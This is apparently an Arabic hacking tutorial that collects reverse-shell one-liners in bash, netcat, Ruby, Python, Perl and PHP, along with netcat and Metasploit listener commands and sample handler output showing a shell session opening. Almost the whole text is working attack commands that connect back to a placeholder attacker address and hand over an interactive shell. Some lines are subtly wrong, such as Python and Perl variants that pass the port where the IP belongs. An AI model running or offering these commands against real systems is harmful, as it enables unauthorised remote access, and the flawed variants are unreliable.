انشاء اتصال عكسي من سطر واحد وبعدة لغات

السلام عليكم و رحمة الله .

هذه معاني المتغيرات التي ستجدها في الشرح. استبدلها عند التطبيق.
$ATTCKER_IP: هو عنواد المهاجم
$ATTACKER_PORT: هو المنفذ الذي ينصت عليه الضحية

$VICTIM_IP: هو عنواد المهاجم
$VICTIM_PORT: هو المنفذ الذي ينصت عليه الضحية

Listining

تستطيع الإنصات بأي طريقة تحبها

- NetCat

1	nc -lvp $ATTACKER_PORT

أو

1	ncat -lvp $ATTACKER_PORT

- Metasploit

1	./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=$ATTCKER_IP LPORT=$ATTACKER_PORT E

1 2 3 4 5 6 7 8

PAYLOAD => windows/shell/reverse_tcp LHOST => $ATTCKER_IP LPORT => $ATTCKER_PORT [*] Started reverse handler on $ATTCKER_IP:$ATTCKER_PORT [*] Starting the payload handler... [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to $VICTIM_IP [*] Command shell session 1 opened ($ATTCKER_IP:$ATTCKER_PORT -> $VICTIM_IP:47657)

Reverse connection

Bash

1	bash -i >& /dev/tcp/$ATTCKER_IP/$ATTCKER_PORT 0>&1

NetCat

1	nc -nvv $ATTCKER_IP $ATTCKER_PORT -e /bin/bash

أو

1	nc -c /bin/sh $ATTCKER_IP $ATTCKER_PORT

Ruby

1	ruby -r socket -e ' f=TCPSocket.open("$ATTCKER_IP",$ATTCKER_PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Python

1	python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ATTCKER_PORT",$ATTCKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Perl

1	perl -e 'use Socket;$i="$ATTCKER_PORT";$p=$ATTCKER_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))) {open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

Php

1	php -r '$sock=fsockopen("$ATTACKER_IP",$ATTACKER_PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

دروس وتعليمات,كل,ما يتعلق بالإختراق,

عبر عن مدى إستفادتك بتقييمك للموضوع :

{[['']]}